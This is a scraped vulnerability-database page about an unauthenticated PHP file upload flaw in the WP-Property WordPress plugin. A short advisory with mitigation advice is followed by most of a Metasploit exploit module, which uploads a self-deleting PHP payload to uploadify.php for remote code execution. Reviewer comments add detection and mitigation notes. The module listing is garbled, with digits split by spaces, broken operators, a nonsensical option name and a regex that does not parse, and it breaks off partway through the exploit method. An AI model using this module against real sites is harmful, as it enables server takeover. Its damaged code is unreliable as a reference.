WordPress WP-Property PHP file upload vulnerability - vulnerability warning - the black bar safety net

2013-01-03T00:00:00
ID MYHACK58:62201336547
Type myhack58
Reporter 佚名
Modified 2013-01-03T00:00:00

Description

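WordPress WP-Property PHP file upload vulnerability

According to the module description quoted below, the WP-Property plugin for WordPress (version 1.35.0 and earlier) exposes a bundled third-party uploadify.php script that accepts file uploads to a temp directory without authentication, which results in arbitrary code execution. Sites running the plugin should update it, remove or deny direct web access to wp-content/plugins/wp-property/third-party/uploadify/uploadify.php, and review that directory and the web access logs for unexpected .php files and POST requests to the script.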

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# NOTE(review): this listing was recovered from a page that collapsed it onto
# two lines inside a quote block. Line breaks and indentation are restored;
# every code token and string is kept exactly as the page shows it, including
# values that look damaged by extraction or machine translation (digits split
# by spaces, `= >`, `. ` inside method calls and strings, the option name
# passed to OptString, the regex in #exploit). The page paginates, so the
# listing stops partway through #exploit.

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin; the 'Description' string below states the affected
# versions and the impact.
#
# Defensive reading: everything this module sends goes to
# wp-content/plugins/wp-property/third-party/uploadify/uploadify.php under the
# WordPress base path. Updating the plugin, removing or denying direct access
# to that script, disabling PHP execution in upload directories, and alerting
# on requests to that path are the corresponding mitigations and detections.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, description, authors, references,
  # payload constraints, targets, disclosure date) and one required string
  # option holding the WordPress base path, defaulting to '/wordpress'.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
      # The description is a runtime string and is kept on one line so its
      # contents stay exactly as shown on the page.
      'Description' => %q{ This module exploits a vulnerability found in WP-Property < = 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. },
      'Author' =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts. james[at]gmail. com>' # metasploit module
        ],
      'License' => MSF_LICENSE,
      # NOTE(review): the numeric identifiers below appear with a space between
      # every digit on this page; confirm them against the upstream module
      # before using them for lookups.
      'References' =>
        [
          [ 'OSVDB', '8 2 6 5 6' ],
          [ 'BID', '5 3 7 8 7' ],
          [ 'EDB', '1 8 9 8 7'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      # Declares the NUL byte as a bad character for the payload.
      'Payload' =>
        {
          'BadChars' => "\x00",
        },
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      # Two targets are declared; 'DefaultTarget' => 0 selects the first.
      'Targets' =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          # NOTE(review): `= >` is shown split on the page; as written it is
          # not a valid hash rocket.
          [ 'Linux x86', { 'Arch' = > ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      # NOTE(review): date digits are space-separated on the page.
      'DisclosureDate' => 'Mar 2 6 2 0 1 2'))

    # NOTE(review): the first argument is the option's name. The text shown
    # here reads like a translation artifact rather than an identifier, while
    # #check and #exploit read target_uri; confirm against the upstream module.
    register_options(
      [
        OptString. new('either the targeturi parameter', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Sends one GET for the plugin's uploadify.php under the configured base
  # path. Returns CheckCode::Unknown when there is no response or the status
  # is not 200 (shown as `2 0 0` on the page), otherwise CheckCode::Appears.
  #
  # NOTE(review): only the status code is examined. The plugin version is not
  # compared, so Appears means the script is reachable, not that the install
  # is confirmed vulnerable. The same reachability test is a quick way for a
  # site owner to tell whether the script is exposed.
  def check
    uri = target_uri. path
    # Normalise the base path so it ends in exactly one trailing slash before
    # the plugin path is appended.
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res. code != 2 0 0
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Builds and sends a multipart POST to uploadify.php. Only the upload request
  # is visible here; the rest of the method is on the page's next part.
  #
  # Detection note: the request shape visible below is a multipart/form-data
  # POST to uploadify.php carrying a "Filedata" file part whose filename ends
  # in php and a "folder" part naming the uploadify directory. Requests of
  # that shape in access logs or WAF telemetry warrant investigation.
  def exploit
    uri = target_uri. path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # File name for the uploaded part, built from rand_text_alpha(5).
    @payload_name = "#{rand_text_alpha(5)}. php"
    # presumably provided by the PhpEXE mixin included above; confirm upstream
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message. new
    data. add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data. add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # NOTE(review): this regex literal looks damaged by extraction: its closing
    # delimiter is escaped, so the statement does not parse as shown.
    post_data = data. to_s. gsub(/^\r\n\-\-\Part\/, '--Part')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype' => "multipart/form-data; boundary=#{data. bound}",
      'data' => post_data
    })

    # (listing truncated here: the source page continues on a second page)